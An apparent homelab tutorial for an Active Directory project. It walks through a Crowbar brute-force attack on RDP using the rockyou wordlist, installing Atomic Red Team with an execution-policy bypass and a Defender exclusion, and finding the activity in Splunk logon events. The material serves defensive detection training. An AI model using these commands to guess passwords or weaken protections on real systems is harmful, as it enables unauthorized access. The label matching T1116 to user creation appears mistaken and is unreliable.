In Part 5
of the Active Directory Project, you will simulate an attack using Kali Linux to perform a brute force attack, then install and configure Atomic Red Team to generate telemetry on your Windows target machine. By the end, you’ll understand how to detect these attacks using Splunk, refining your skills in cybersecurity monitoring.
- Kali Linux VM
Make sure Kali Linux is set up and connected to your lab network. - Splunk and Sysmon
Installed and configured on the target and Active Directory machines.
- Open Network Connections on Kali Linux and edit the wired connection.
- Set IP configuration to Manual and assign:
- IP Address:
192.168.1.2
- Netmask:
255.255.255.0
- Gateway:
192.168.1.1
- DNS Server:
8.8.8.8
- IP Address:
- Save the settings, disconnect, and reconnect to apply changes.
-
Install Crowbar, a brute force tool:
sudo apt-get install crowbar -y
-
Navigate to the rockyou wordlist:
cd /usr/share/wordlists/ sudo gunzip rockyou.txt.gz
-
Copy the rockyou.txt file to a new project directory:
mkdir ~/ad-project cp rockyou.txt ~/ad-project/passwords.txt
- On your Windows target machine, go to This PC > Properties > Advanced System Settings.
- Enable Allow remote connections and add Jenny Smith and Terry Smith as remote users.
- Confirm settings to allow RDP access for your attack simulation.
-
On Kali Linux, enter the following Crowbar command to start a brute force attack on RDP:
crowbar -b rdp -u TSmith -C ~/ad-project/passwords.txt -s 192.168.1.10/32
-
This command will try each password in
passwords.txt
against the TSmith user on the Windows target machine, simulating a brute force attempt.
-
Open Splunk, navigate to Search & Reporting, and search for recent failed logon events.
-
Search using:
index="endpoint" "T Smith"
-
Look for Event Code 4625 (failed logons) and Event Code 4624 (successful logon) to analyze brute force indicators.
-
Open PowerShell as an administrator on the Windows target machine.
-
Run the following to bypass execution policy and download Atomic Red Team:
Set-ExecutionPolicy Bypass -Scope CurrentUser iwr -Uri https://path-to-atomic-red-team -OutFile C:\AtomicRedTeam.zip Expand-Archive -Path C:\AtomicRedTeam.zip -DestinationPath C:\AtomicRedTeam
- Open Windows Security > Virus & Threat Protection > Manage Settings.
- Add an exclusion for the C:\AtomicRedTeam folder to prevent Defender from blocking tests.
-
Use PowerShell to initiate a specific test (e.g., create a new user):
Invoke-AtomicTest T1116
-
Go to Splunk and search for telemetry data related to this activity:
index="endpoint" "T1116"
By completing Part 5, you should now have:
- Experience with Brute Force Attacks using Crowbar on Kali Linux.
- Atomic Red Team Configured on the target machine to simulate attacks.
- Telemetry Analysis in Splunk to detect and monitor security events.
This final part of the Active Directory Project has equipped you with hands-on skills in monitoring, detecting, and analyzing threats within an Active Directory environment.